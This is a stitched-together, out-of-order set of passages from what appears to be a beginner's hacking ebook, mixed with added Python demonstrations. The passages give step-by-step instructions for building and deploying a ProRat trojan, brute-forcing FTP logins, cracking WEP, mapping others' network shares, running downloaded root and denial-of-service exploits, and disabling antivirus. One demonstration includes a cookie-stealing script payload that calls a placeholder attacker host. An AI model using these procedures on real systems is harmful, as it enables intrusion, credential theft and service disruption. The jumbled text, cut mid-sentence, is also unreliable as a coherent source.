[Screenshot: a BIOS setup screen showing System Time, System Date, Drive Configuration and Boot Sequence.]
a victim installs the server onto his computer and what the hacker could do next.

12. I'm going to run the server on my own computer to show you what would happen. Once I run it, the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address and port and clicking Connect. He will be asked for the password that he set when he created the server. Once he types it in, he will be connected to my computer and have full control over it.

[Screenshot: ProRat v1.9 connected to 127.0.0.1, prompting for the server password, with the function buttons (PC Info, Message, Chat, Funny Stuff, Passwords, File Manager, Explorer, Control Panel, Shut Down PC, Clipboard, Give Damage, Downloader, Online Editor, Run ProConnective) down the right side.]

13. Now the hacker has a lot of options to choose from, as you can see on the right. He has access to all my computer's files; he can shut down my PC, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screenshot of my computer and so much more. Below I'll show you a few examples.

[Screenshot: ProRat's PC functions menu: Hide Desktop Icons, Lock Ctrl-Alt-Del, Hide Start Button, Open Ctrl-Alt-Del, Hide Taskbar.]
address 127.0.0.1 would be the hacker's IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.

Brute Force Attacks

Given enough time, a brute force attack can crack any password. Brute force attacks try every possible combination of letters, numbers and special characters until the right password is found, so they can take a very long time. The speed is determined by the speed of the computer running the cracking program (and, for an online attack like this one, by how fast the target accepts login attempts) and by the length and complexity of the password. Below I will show you how Brutus can be used against the same FTP server, but this time using the brute force option.

1. Put in the target and port the same way you did for the dictionary attack. For the pass mode choose Brute Force and click Range.

[Screenshot: Brutus AET2 (www.hoobie.net/brutus, January 2000) with Target 127.0.0.1, Type FTP, Port 21, 10 connections, 10 second timeout, Pass Mode set to Brute Force and UserID admin.]

2. If you have an idea of what the password might be, then you can choose the right options. For example, if you know a site requires passwords to be a certain length, then you'll know what to put down as the minimum length, thus narrow
all depends on what your goals are. Nowadays, with all the point-and-click programs out there, you can be a fairly good ethical hacker without knowing any programming. You can do some effective hacking if you understand all of the security tools very well. Even if you understand what's going on in the background of these programs, most people will still classify you as a script kiddie.

Personally, I think you should learn some programming. Even if it's only the very basics, it'll give you a much better understanding of what's going on. Also, once you learn how to program well, you'll be able to develop your own exploits, which is great in many ways:

1. You'll be considered an elite hacker.
2. Imagine a black hat discovers a vulnerability and codes an exploit for it that no one else knows about. The black hat would be able to take down thousands of machines before anyone discovers and patches the vulnerability.
3. You will feel so much more satisfied having created your own program or exploit. I promise you this.

So my advice is: don't settle for being a point-and-click hacker. Take some time to understand even just the basics of programming and an entire new world of hacking will open up to you.

Where should I start?

Many people finally decide that they are going to begin learning a programming language but don't know where to start. I believe that before you begin to learn a programming language you should first master HTML (HyperText Markup Language). HTML is part of what makes up all of the website pages you see on the internet. HTML is very easy to learn and it'll get you used to looking at source code.

From there I would suggest starting your programming life with C. C is one of the most popular languages, and the majority of the exploits out there today are written in it. C also makes up some of the most powerful hacking programs and viruses that are out there today.

Best way to learn

So how should I go about learning the programming language of my choice?

1. Purchase a beginner's book on your programming language. Before you choose the book, read the reviews to make sure it's a good choice. It is important that once you begin learning the programming language through your book you don't take big breaks. Taking long breaks will cause you to forget things you learned in the beginning that apply to the rest of the book. Do ALL of the practice problems provided in the book. The only way you will become better is by applying what you learn. When something difficult comes up, or something that makes no sense to you, don't avoid or skip it. Instead, embrace it. This is how you actually learn. If you still don't understand it after going over it multiple times, find someone that can help you.
2. Join a programming forum. Search for a website on your programming language that has a large user base. There will be many profes
ation Done

    The following extra packages will be installed:
      d
      pkg-dev g++ g++-4.2 libc6-dev libstdc++6-4.2-dev libtimedate-perl linux-libc-dev patch
    Suggested packages:
      debian-keyring g++-multilib g++-4.2-multilib gcc-4.2-doc libstdc++6-4.2-dbg
      glibc-doc manpages-dev libstdc++6-4.2-doc diff-doc
    The following NEW packages will be installed:
      build-essential dpkg-dev g++ g++-4.2 libc6-dev libstdc++6-4.2-dev libtimedate-perl
      linux-libc-dev patch
    0 upgraded, 9 newly installed, 0 to remove and 1 not upgraded.
    Need to get 0B/8703kB of archives.
    After this operation, 34.3MB of additional disk space will be used.
    Do you want to continue [Y/n]?

9. This command downloads the packages and then asks you if you would like to continue with installing. Type in a y and hit enter. It will install the packages automatically.

10. Now, to compile the script, type in the command gcc exploit.c. It will compile quickly. If no error was displayed, it was successful. Using the ls command you can now see there's a new file named a.out: this is the compiled program. Before you compile anything you downloaded, read through the source. Exploit code from the internet runs with your privileges, and a program you don't understand may do more than it claims.

11. To run the new file, type in the command ./a.out. This will display a short usage note telling you how to run the exploit against a server. The image below shows all of these steps together.

[Screenshot: an Ubuntu terminal listing the home directory (Desktop, Documents, exploit.c, Music, Pictures, Public, Templates, Videos) before the compile and run steps.]
[Screenshot: ProRat's Create menu: Create ProRat Server (342 KB), Create Downloader Server (2 KB), Create CGI Victim List (16 KB), Help.]

4. Next, put in your IP address so the server can connect back to you. If you don't know your IP address, click on the little arrow to have it filled in for you automatically. Next, put in your e-mail so that when and if a victim gets infected, it will send you a message. We will not be using the rest of the options.

[Screenshot: the Create Server window, Notifications tab. ProConnective Notification (supports reverse connection through networks and routers) with the IP/DNS address field, and Mail Notification, ICQ Pager Notification and CGI Notification, which do not support reverse connection.]

5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect to them, and the victim name. As you can see, ProRat has the ability to disable the Windows firewall and hide itself from being displayed in the Task Manager.

[Screenshot: the Create Server window, General Settings tab.]
can see below, it got the correct combination of username admin and password password.

[Screenshot: Brutus's Positive Authentication Results showing Target 127.0.0.1, Type FTP, Username admin, Password password. The status log reads: Located and installed 1 authentication plug-ins; Initializing; Target 127.0.0.1 verified; Opened user file containing 6 users; Opened password file containing 818 passwords; Maximum number of authentication attempts will be 4908; Engaging target 127.0.0.1 with FTP; Trying username: admin; Positive authentication at 127.0.0.1 with User: admin Password: password (550 attempts); Trying username: administrator.]

10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloak your IP address by sending your connection request through another computer before it reaches the target. This matters because, as you can see in the image below, Brutus leaves a huge log of your presence on the target server: one entry per failed login, hundreds of them within the same second, all from the same source address.

[Screenshot: the FTP server's log, dozens of entries all stamped 10/23/2008 17:01:09 PM from the attacking host, one per login attempt.]
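The dictionary attack above and the brute force attack with a length range described later in the chapter are the same loop with a different candidate generator. As an added example that is not part of the book, the Python below runs both against a constructed stand-in for the FTP server, counts attempts, and keeps the same kind of log the real server kept, which is what gives the attacker away. keyspace() shows why the Range settings matter: narrowing the character set or the length range shrinks the search by orders of magnitude.

```python
import itertools
import string


class FakeFtpServer:
    """Constructed stand-in for the target: one account, and a log line per attempt,
    as a real FTP daemon writes one for every failed login."""

    def __init__(self, accounts: dict):
        self._accounts = accounts
        self.log = []

    def login(self, user: str, password: str) -> bool:
        ok = self._accounts.get(user) == password
        self.log.append("%s %s: %s" % (user, password, "230 Logged in" if ok else "530 Login incorrect"))
        return ok


def dictionary_attack(login, user, wordlist):
    """Try each word in order; return (password, attempts) or (None, attempts)."""
    for attempts, word in enumerate(wordlist, 1):
        if login(user, word):
            return word, attempts
    return None, len(wordlist)


def brute_force(login, user, charset, min_len, max_len):
    """Try every string over charset from min_len to max_len characters, shortest first."""
    attempts = 0
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            attempts += 1
            candidate = "".join(combo)
            if login(user, candidate):
                return candidate, attempts
    return None, attempts


def keyspace(charset_size, min_len, max_len):
    """Number of candidates the brute force loop may have to try."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


# Constructed word list; "password" sits where the dictionary run finds it.
WORDLIST = ["123456", "letmein", "qwerty", "admin", "password", "lolcats"]

if __name__ == "__main__":
    server = FakeFtpServer({"admin": "password"})
    print(dictionary_attack(server.login, "admin", WORDLIST))
    print(server.log[-1])                        # the entry an administrator reads later
    server = FakeFtpServer({"admin": "cab"})
    print(brute_force(server.login, "admin", string.ascii_lowercase, 1, 3))
    print(keyspace(26, 1, 3), keyspace(95, 8, 8))
```

Every candidate costs a round trip and a log line on the target; lockout after a handful of failures, or rate limiting per source address, turns an 18,278-candidate search into a multi-day affair that no longer goes unnoticed.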
ccess point, and the command ends with your wireless adapter's device name.

7. Now we will force the target access point to send out a huge amount of packets that we can use to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count start to increase. The command is:

    aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 [device]

In this command, -3 selects the attack type, the ARP request replay attack: aireplay-ng captures an ARP request from a client and re-injects it, and the access point answers every copy with a newly encrypted frame, each carrying a fresh initialization vector (IV). -b is the MAC address of the target access point, -h is your wireless adapter's MAC address, and the wireless adapter's device name goes at the end.

8. Once you have collected around 50k to 500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

    aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command, -a 1 forces the program into WEP attack mode, -b is the target's MAC address and -n 128 tells the program the WEP key length in bits (use -n 64 for a 40-bit key). If you don't know the key length, leave -n out. With enough IVs this should crack the WEP key within seconds; the more packets you capture, the better your chance of cracking the WEP key.

[Screenshot: aircrack-ng's key-byte table, one row per key byte, listing the candidate byte values with their vote counts (for example 7D(170496), DD(150528), 5A(148992)).]
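Why does aircrack-ng want tens of thousands of IVs? WEP encrypts every frame with RC4 keyed by the 24-bit IV (sent in the clear) concatenated with the shared key. The IV space is only 16,777,216 values, so a busy network repeats IVs, and a repeated IV means a repeated keystream. The Python below is an added example, not code from the book or from aircrack-ng: it implements RC4 and the WEP frame body (IV, then RC4 over plaintext plus a CRC-32 ICV) and shows that one frame with known plaintext, such as the ARP request aireplay-ng replays, gives the keystream for every other frame sent under the same IV. This is the keystream-reuse weakness, the simpler cousin of the statistical key recovery aircrack-ng actually performs. The key, IV and frame contents are constructed for the demonstration, and the attacker is assumed to know the whole ARP request (its LLC/SNAP header is fixed and the rest is largely predictable).

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream generation; XORs data with the keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _icv(plaintext: bytes) -> bytes:
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear, then RC4(IV || key) over plaintext || ICV."""
    if len(iv) != 3 or len(key) not in (5, 13):          # 40-bit or 104-bit key
        raise ValueError("bad IV or key length")
    return iv + rc4(iv + key, plaintext + _icv(plaintext))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + key, body)
    plaintext, icv = data[:-4], data[-4:]
    if _icv(plaintext) != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR known plaintext = the RC4 keystream for this IV, as far as the plaintext is known."""
    known = known_plaintext + _icv(known_plaintext)
    return bytes(c ^ p for c, p in zip(frame[3:], known))


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt another frame sent under the same IV, without ever learning the key."""
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))


IV_SPACE = 2 ** 24

# Constructed demo data. The LLC/SNAP header for ARP is fixed (AA AA 03 00 00 00 08 06);
# the ARP body below is a request from 192.168.1.101 asking for 192.168.1.1.
KEY = bytes.fromhex("0102030405")                        # 40-bit WEP key
IV = bytes.fromhex("a1b2c3")
ARP_REQUEST = (bytes.fromhex("aaaa030000000806")
               + bytes.fromhex("0001080006040001")       # Ethernet / IPv4 / opcode request
               + bytes.fromhex("000c41f40765") + bytes([192, 168, 1, 101])
               + bytes(6) + bytes([192, 168, 1, 1]))
SECRET = b"POST /login user=david&pass=hunter2"
FRAME_ARP = wep_encrypt(KEY, IV, ARP_REQUEST)
FRAME_SECRET = wep_encrypt(KEY, IV, SECRET)              # same IV reused

if __name__ == "__main__":
    ks = recover_keystream(FRAME_ARP, ARP_REQUEST)
    print(decrypt_with_keystream(FRAME_SECRET, ks)[:len(SECRET)])
```

The ICV is a plain CRC-32, not a MAC, so it adds nothing against this: anyone who knows the keystream can also forge frames with a valid ICV.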
ccessful, the hacker will have all the contents of my shared folder on his computer.

13. To map my drive onto his computer, the hacker would use the command net use G: \\TargetIPaddress\DriveName. So in my case I would run the command net use G: \\192.168.1.101\SharedDocs. You can use any letter in place of G; this just tells the computer what to name the drive on your computer.

    C:\Documents and Settings\David M>net use G: \\192.168.1.101\SharedDocs
    System error 85 has occurred.

    The local device name is already in use.

    C:\Documents and Settings\David M>net use J: \\192.168.1.101\SharedDocs
    The command completed successfully.

14. What's this? Looks like I already have a drive G:. To avoid this problem, go to My Computer, where it will show all of your current drives. To fix this, simply change the letter G to a drive letter that is not in use.

15. Once the command is completed successfully, go to My Computer and you should see a new drive under Network Drives. Double-clicking it brings up all of the target's shared documents.

[Screenshot: My Computer showing Local Disk (C:), Devices with Removable Storage (D: through I:) and, under Network Drives, SharedDocs on 192.168.1.101 (J:).]

Cracking Windows Passwords

To crack Windows XP and Windows Vista passwords we will use the program called ophcrack. Ophcrack
ck requires an exploit for a browser vulnerability. With this type of attack the hacker can install worms, spambots and backdoors onto your computer.

2. Non-Persistent: Non-persistent (reflected) attacks are the most common type and don't harm the actual website. They occur when input that the page echoes back, such as a search term placed into a variable and written into the HTML, is not encoded, so an attacker can insert HTML or client-side script that changes the output the user sees. Non-persistent attacks are only activated when the user visits the URL crafted by the attacker.

3. Persistent: Persistent (stored) attacks are usually used against web applications like guest books, forums and shout boxes, where the injected script is saved on the server and served to every later visitor. Some of the things a hacker can do with a persistent attack are:
- Steal website cookies. Cookies are used by web browsers to store your session information so that you can stay logged into a website even after you leave. By stealing your cookie the attacker can sometimes log in without knowing your password.
- Deface the website.
- Spread worms.

Now that you know what cross-site scripting is, how can you tell if a website is vulnerable to it?

1. If there is a search field, enter a word, and if that word is displayed back to you on the next page, there's a chance it is vulnerable.
2. Now we will insert some HTML. Search for <h1>hi</h1>, and if the word hi is output as a big header, it is vulnerable.

[Screenshot: the search results page rendering "hi" as a large heading above "No results for".]
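The <h1>hi</h1> test above works because the page writes the search term back into its HTML without encoding it. As an added example that is not part of the book, the Python below models the two flavours described, a reflected (non-persistent) search page and a stored (persistent) guest book, each in its vulnerable form beside a hardened form that HTML-escapes user input, together with the check the book describes: does the probe come back as live markup? The pages and probe strings are constructed; the escaping is html.escape from the standard library.

```python
import html

PROBE = "<h1>hi</h1>"
# Constructed payload of the cookie-stealing kind the text describes; attacker.example is a placeholder.
COOKIE_STEALER = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


# Non-persistent (reflected): input comes from the URL and goes straight back into the page.
def vulnerable_search(query: str) -> str:
    return "<p>No results for " + query + "</p>"


def hardened_search(query: str) -> str:
    return "<p>No results for " + html.escape(query, quote=True) + "</p>"


# Persistent (stored): input is saved on the server and rendered for every later visitor.
class Guestbook:
    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.entries = []

    def post(self, name: str, message: str) -> None:
        self.entries.append((name, message))

    def render(self) -> str:
        enc = (lambda s: html.escape(s, quote=True)) if self.escape_output else (lambda s: s)
        return "".join("<div><b>%s</b>: %s</div>" % (enc(n), enc(m)) for n, m in self.entries)


def reflects_unescaped(render, probe: str = PROBE) -> bool:
    """The book's test: if the probe appears verbatim in the response, the browser will render it as markup."""
    return probe in render(probe)


if __name__ == "__main__":
    print("reflected, vulnerable:", reflects_unescaped(vulnerable_search))
    print("reflected, hardened: ", reflects_unescaped(hardened_search))
    book = Guestbook(escape_output=False)
    book.post("mallory", COOKIE_STEALER)
    book.post("alice", "nice site")
    print("stored payload served to alice too:", COOKIE_STEALER in book.render())
```

Escaping at output time fixes both variants for text placed between tags. Input that lands inside an attribute, a URL or a script block needs the encoding for that context instead; html.escape alone is not enough there.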
com/q-ethical-hacker-jobs.html
- Show off your newfound skills to your friends, and just hack because you want to. It's FUN!

What is a hacker?

A hacker is someone who likes to tinker with electronics or computer systems. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren't intended to do. There are two types of hackers:

White Hat: These are considered the good guys. White hat hackers don't use their skills for illegal purposes. They usually become computer security experts and help protect people from the black hats.

Black Hat: These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards and deface websites.

These two terms came from the old western movies, where the good guys wore white hats and the bad guys wore black hats.

Now, if you're thinking "Oh boy! Being a black hat sounds awesome!", then I have a question for you. Does it sound cool to live in a cell the size of your bathroom, with a cellmate you didn't choose, for many years? That's what I thought.

Hacker Hierarchy

Script kiddies: These are the wannabe hackers. They are looked down upon in the hacker community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any
could list several e-mail addresses that are published on the website. Another search you could do in Google is inurl:robots.txt; this looks for pages called robots.txt. If a site has a robots.txt file, it lists the directories and pages the site owner has asked search engine spiders not to index. The file is advisory only and anyone can read it, so occasionally you might come across some valuable information in it that was meant to be kept private.

Now that the basics of footprinting have been explained, we will move on to port scanning.

Port Scanning

The point of port scanning a server is to detect its open ports, that is, the ports with listening services. Once a hacker knows all the services running on your server, he can search for vulnerabilities they may have and exploit them to take control of your website. In the port scanning example we will use the most popular port scanner, Nmap. The Nmap Security Scanner is available for Linux, Mac and Windows (http://nmap.org/download.html). The example will be shown using the Nmap GUI (graphical user interface), otherwise known as Zenmap.

1. First the hacker would choose a target and place it in the Target box. As you can see, the Command section gets updated as well. This is what the command would look like if you were running the CLI version.

[Screenshot: Zenmap with an untitled scan open, showing the Target field and the generated Nmap command line.]
[Screenshot: VirtualBox file chooser selecting ubuntu-8.04.1-desktop-i386.iso, with the file type set to CD/DVD-ROM Images.]

16. Hit Select.

[Screenshot: the Virtual Disk Manager, CD/DVD Images tab, listing ubuntu-8.04.1-desktop-i386.iso from the Downloads\Linux folder, not yet attached.]

17. You will come back to where you started. Hit OK.

[Screenshot: Ubuntu Settings, CD/DVD-ROM section, with Mount CD/DVD Drive checked and the ISO Image File set to ubuntu-8.04.1-desktop-i386.iso.]

18. You will now see the main screen again. Click on START in the top left corner.

[Screenshot: the VirtualBox main window with the Ubuntu machine listed as Powered Off.]

19. You will see Ubuntu boot up in a small pop-up screen. Choose the option "Try Ubuntu without any change to your computer". If you see a list of countries instead of the menu shown below, select yours and hit <ENTER>. Make sure you are working in the virtual environment by clicking into the Ubuntu window.

[Screenshot: the Ubuntu boot menu inside Sun xVM VirtualBox, with "Try Ubuntu without any change to your computer" highlighted.]
e knowledge.

Chapter Four: Passwords

Nowadays passwords are the only form of security on most websites and computer systems. This has made them one of the most common and easiest ways for a hacker to gain unauthorized access to your computer or network.

Password Cracking

Before we get into cracking passwords with programs, I will explain a couple of old-fashioned ways to obtain someone's password.

Social Engineering

Social engineering is when a hacker takes advantage of trusting human beings to get information from them. For example, if the hacker was trying to get the password for a co-worker's computer, he (even though I use "he", hackers are of both genders; I just chose to use "he" in these examples) could call the co-worker pretending to be from the IT department. The conversation could be something like:

Bob: "Hello Suzy. My name is Bob and I'm from the IT department. We are currently attempting to install a new security update on your computer, but we can't seem to connect to the user database and extract your user information. Would you mind helping me out and letting me know your password before my boss starts breathing down my neck? It's one of those days, ya know?"

Suzy would probably feel bad for Bob and let him know her password without any hesitation. BAM! She got social engineered. Now the hacker can do whatever he pleases with her account.

Shoulder Surfing

Shoulder surfing is
e -t <target address here> -o <offset here>

13. Once a hacker runs this script against a vulnerable machine and the script works, he will have root access to the target computer.

The more exploits you run, the more you will notice that half of them may not work. Many exploits are created and tested in specific environments, and the expected outcome only happens when the exploit is run in the exact same environment: the same software version, build and configuration, because details such as memory offsets change between them. That is another reason why programming knowledge is needed, so you can edit the exploit script to work for you.

Once a skilled hacker gains root on a server, he has the ability to do a lot of damage. Some of the things a hacker might do with a rooted server are:
- Add himself as a permanent user for future access.
- Add the server to his botnet so he can use it as a weapon against other servers.
- Use it as a proxy to hack other websites.
- Install a rootkit so he can come back and have full control over the server when needed.
- Constantly steal information as it comes in.
- Use the system to store illegal data.
- Deface the website; sometimes the hacker will delete everything off the server.

Countermeasures

There are a few things you can do to stay secure from network hacking attempts.

1. Keep all your software up to date. There will always be new vulnerabilities coming out, and it is your responsibility to patch them immediately after a patch comes out.
2. Implement a firewall. This will keep most
[Screenshot: results of a ping test run against the target from checkpoints in cities around the world (Cagliari, Copenhagen, Antwerp, Krakow, Nagano, Sydney, Hong Kong, Lille, Auckland, Melbourne, Haifa, Singapore, Porto Alegre, Mumbai, Zurich, Johannesburg), each with three round-trip times in milliseconds and a status of Okay, except Shanghai, China, where 100% of packets were lost.]

4. Next the hacker would do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website. As you can see, this gives a HUGE amount of information about the company. You see the company's e-mails, address, contact names, when the domain was created, when the domain expires, the domain name servers and more.

5. A hacker can also take advantage of search engines to search sites for data. For example, a hacker could search a website through Google by searching site:www.the-target-site.com; this will display every page that Google has indexed on the website. You could narrow down the number of results by adding a specific word after it. For example, the hacker could search site:www.the-target-site.com email. This search
e control of your mouse. It can also be used for some serious things like accessing your data, erasing your files, stealing your passwords and capturing your keystrokes.

4. Logic Bombs: Logic bombs are pieces of code programmed into a program that lie dormant until a certain time, or until a user performs a certain action, which causes them to execute. When triggered, a logic bomb performs a function the program wasn't intended to do.

5. Bacteria: Bacteria make many copies of themselves and eventually end up taking up all of the computer's resources, such as all of its processor power, memory and disk space. This results in the legitimate user losing access to those resources.

6. Blended Threats: Blended threats combine the characteristics of the above and use them along with system vulnerabilities to spread and infect machines.

ProRat

To show you an example of a malicious program, I will use a well-known Windows trojan, ProRat.

1. Download ProRat. Once it is downloaded, right-click on the folder and choose to extract it. A password prompt will come up; the password is "pro".
2. Open up the program. You should see the following.

[Screenshot: the ProRat main window (PRO Group) with buttons such as Message, File Manager, Shut Down PC, Downloader and Run ProConnective.]

3. Next we will create the actual trojan file. Click on Create and choose Create ProRat Server (342 K
earn how to program. Also, every now and then you will receive other errors, such as the one the second picture above shows. These errors have to do with the server's configuration. Now, as a hacker, you have to learn a lot on your own. Going around asking simple questions like this all the time will make you look bad, and the most common response you will receive is www.google.com. Google is your friend, so take advantage of it. So, starting now, begin to use Google, and if you are still stuck, then you can ask for help on community forums.

5. Once the errors are fixed and the program is running, a DoS attack will be launched against the target website until you exit the command screen. If the target server can't handle much, you may be able to see the effect of your exploit by going to the site and clicking around. If it is working, the site will begin to lag and it'll take a long time to load pages. Eventually the server may go down completely.

Perl

Running Perl exploit scripts is just as easy as running PHP scripts. Download and install the appropriate version of ActivePerl. Next, the hacker would find an exploit for a vulnerability. In this example we will use the following exploit, http://milw0rm.com/exploits/6581, for WinFTP Server 2.3.0. This is also a Denial of Service (DoS) exploit. Edit the options, like the target server and others, as needed. Then save the file as exploit.pl. As you can see, Perl exploits begin with #!/usr/bin/perl
eless Hacking

    Learning Linux

    Password Cracking
    Phishing
    Countermeasures
    More Programs

    Footprinting
    Port Scanning
    Banner Grabbing
    Searching for Vulnerabilities
    Penetrating
    Countermeasures

    1. Scanning for Wireless Networks
    2. Cracking WEP
    3. Packet Sniffing
    4. Countermeasures

Windows Hacking .......... 79
    1. NetBIOS
    2. Cracking Windows Passwords
    3. Countermeasures

Malware .......... 93
    1. Definitions
    2. ProRat
    3. Countermeasures

Web Hacking .......... 104
    1. Cross Site Scripting
    2. Remote File Inclusion
    3. Local File Inclusion

Conclusion .......... 114
    1. Congratulations
    2. Keep Learning
    3. www.MrCracker.com

Chapter One: Introduction

How can I use this eBook?

Congratulations! By purchasing this eBook you have taken your first step in the exciting process of becoming a Master Hacker. The knowledge you acquire from this eBook can be put to use in many ways:

- With the ability to think like a hacker, you'll be able to protect yourself from hackers attacking you.
- You may wish to seek a career in ethical hacking. Usually hired by an organization, an ethical hacker uses the same tools and techniques as a hacker to find and secure vulnerabilities in computer systems.
  - http://www.jobster.com/find/US/jobs/for/ethical+hacker
  - http://www.indeed
50. essionals ready to help you. It also has a large database of security papers and tools.
• DarkMindz - A large hacking-related community that constantly provides informative information on the forum, security papers and source code.
• Black Hat Forums - A great hacking-related forum full of many knowledgeable members.

Since hacking and programming go together like peanut butter and jelly, below I have a list of a few great programming forums:
• <dream.in.code>
• Programming Forums
• Go4Expert
• CodeCall

www.MrCracker.com

MrCracker.com is my security/hacking blog. I have just launched it and will be constantly updating it. Come on down and subscribe to my soon-to-be-launched newsletter. It will be full of hacking-related news and exclusive content. The subscribe box is on the right column of my website. Hurry before it's too late!

Suggestions

I would love to hear your honest opinion about this course. What did you think of it? What did you like? What didn't you like? What would you like to see in future versions? What are you interested in? Please visit the following URL to participate in this quick, informative survey: Click here for survey.

That's all folks! I hope that this course has been a great learning experience for you. If you have any questions, please feel free to e-mail me at info@MrCracker.com.

Cheers,
David Melnichuk
51. etBIOS
143 - IMAP (Internet Message Access Protocol)
161 - SNMP (Simple Network Management Protocol)
194 - IRC (Internet Relay Chat)
220 - IMAP3 (Internet Message Access Protocol 3)
443 - SSL (Secure Socket Layer)
445 - SMB (NetBIOS over TCP)
1352 - Lotus Notes
1433 - Microsoft SQL Server
1521 - Oracle SQL
2049 - NFS (Network File System)
3306 - MySQL
4000 - ICQ
5800 - VNC
5900 - VNC
8080 - HTTP

Along with finding out what ports are running, the hacker also needs to find out what operating system the server is running. There are always a lot of operating system vulnerabilities out there to choose from, so by knowing the operating system the hacker's chances of taking over the server go up. As you can see, there is an option in Nmap to detect the operating system, but this scan is very loud and easily detected, so it is better to avoid it if possible.

A simple way to determine what the server is running is by getting a 404 error page. You can get there by going to a page that doesn't exist. For example, the hacker would put in www.targetsite.com/asdlfjasl.php; this page will most likely not exist and bring him to the 404 page. On most sites the 404 error page displays the server operating system along with its version. Many sites nowadays don't display this because they put up custom 404 pages, so this may not always work.

If you are planning on using the CLI version of Nmap, or want a more in-depth look at all the commands, take a look
52. exactly what it sounds like. The hacker would simply attempt to look over your shoulder as you type in your password. The hacker may also watch whether you glance around your desk, looking for a written reminder or the written password itself.

Guessing

If you use a weak password, a hacker could simply guess it by using the information he knows about you. Some examples of this are date of birth, phone number, favorite pet and other simple things like these.

Now that we have the simple low-tech password cracking techniques out of the way, let's explore some high-tech techniques. Some of the programs I will use in my examples may be blocked by your anti-virus programs when you attempt to run them. Make sure you disable your anti-virus program when you decide to download and explore them.

There are different ways a hacker can go about cracking a password. Below I will explain and give an example of each way.

Dictionary Attacks

A dictionary attack is when a text file full of commonly used passwords, or a list of every word from the dictionary, is used against a password database. Strong passwords usually aren't vulnerable to this kind of attack. In the following example I will use Brutus, a very common password cracker, to show a dictionary attack against an FTP server. Brutus is a Windows-only program, but at the end of this chapter I will list a couple more password crackers, some of which are made for Mac, Windows and Linux.
53. for on-line help; type :help version<Enter> for version info. Running in Vi compatible mode; type :set nocp<Enter> for Vim defaults; type :help cp-default<Enter> for info on this.

4. To get into typing mode, type in I (Shift+i).
5. You are now in insert mode. Right click and paste in the exploit.
6. The script should have pasted in. Now it's time to save it. Hit the <ESC> key and then type in :wq exploit.c. This quits and saves the document as exploit.c.
7. Now type in the command ls. This command lists all the files in the current directory. You should see your newly made file in the list.

[Screenshot: Ubuntu terminal]
ubuntu@ubuntu:~$ vi
ubuntu@ubuntu:~$ ls
Desktop Documents exploit.c Music Pictures Public Templates Videos
ubuntu@ubuntu:~$

8. Now we will compile the script using the GCC compiler, but before we compile this script we need to first install a development package of all the libraries and headers needed to compile C/C++ scripts. It's a very easy process. In the terminal, type in the following command: sudo apt-get install build-essential

[Screenshot: Ubuntu terminal]
To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
ubuntu@ubuntu:~$ sudo apt-get install build-essential
Reading package lists... Done
Building dependency tree
Reading state inform
54. fox do with this file?

[Screenshot: Firefox download dialog: "Open with PowerISO (default)"; "Do this automatically for files like this from now on"]

2. Download and install IsoRecorder at http://isorecorder.alexfeinman.com/isorecorder.htm and burn the Ubuntu iso file onto a blank CD with the software. Once you have downloaded and installed the IsoRecorder software, locate the Ubuntu image file, right click and select "Copy image to CD" and follow the rest of the steps shown in the image.

[Screenshot: Windows Explorer, folder C:\Downloads\Linux, right-click context menu on ubuntu-8.04.1-desktop-i386.iso (694 MB) showing "Copy image to CD" along with the usual Open With, PowerISO, archive, Send To, Cut, Copy, Create Shortcut, Delete, Rename and Properties entries]
55. g through a network, such as usernames, passwords, IM conversations and e-mails. Let me show you an example.

1. Download and install Wireshark.
2. Launch it and click on the option to list the available capture interfaces, as shown below.

[Screenshot: The Wireshark Network Analyzer, toolbar button "List the available capture interfaces"; Capture Interfaces list showing "Adapter for generic dialup and VPN capture" and "NETGEAR WG111 802.11g Wireless USB2.0 Adapter (Microsoft's Packet Scheduler) 192.168.1.101"]

3. Next, choose the target to begin to capture their packets and click on Start.
4. If you don't know which one to choose, wait a little bit; the one that accumulates the most packets is your best choice. Many captured packets show that the user is currently active.

[Screenshot: Wireshark Capture Interfaces dialog; the NETGEAR WG111 adapter at 192.168.1.101 shows 920 packets, 76 packets/s]

5. Now, to show you an example of how Wireshark can be used, I will start up Windows Live and send a message. As you will see in the image below, my whole conversation will be captured. To filter out all the useless data and to only display the Windows Live related packets, type in msnms in the filter bar.

[Screenshot: Wireshark capture on the NETGEAR WG111 802.11g Wireless
56. gcc exploit.c

[Screenshot: Ubuntu terminal]
ubuntu@ubuntu:~$ ls
